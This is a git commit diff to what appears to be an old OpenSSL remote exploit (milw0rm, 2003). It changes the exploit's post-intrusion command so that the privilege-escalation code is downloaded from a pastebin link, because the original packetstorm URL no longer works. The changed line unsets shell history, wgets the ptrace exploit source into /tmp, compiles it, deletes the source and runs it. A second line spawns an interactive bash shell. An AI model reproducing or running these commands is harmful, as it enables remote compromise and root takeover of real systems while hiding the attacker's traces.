Update the link
It is copied to a pastebin since it is unable to be downloaded from packetstormsecurity
This commit is contained in:
@@ -668,7 +668,9 @@ typedef struct {
|
||||
} ssl_conn;
|
||||
|
||||
#define COMMAND1 "TERM=xterm; export TERM=xterm; exec bash -i\n"
|
||||
#define COMMAND2 "unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
|
||||
// #define COMMAND2 "unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
|
||||
|
||||
#define COMMAND2 "unset HISTFILE; cd /tmp; wget https://pastebin.com/raw/C7v25Xr9 -O ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
|
||||
|
||||
long getip(char *hostname) {
|
||||
struct hostent *he;
|
||||
@@ -1304,4 +1306,4 @@ int main(int argc, char* argv[])
|
||||
}
|
||||
/* spabam: It isn't 0day */
|
||||
|
||||
// milw0rm.com [2003-04-04]
|
||||
// milw0rm.com [2003-04-04]
|
||||
|
||||
Reference in New Issue
Block a user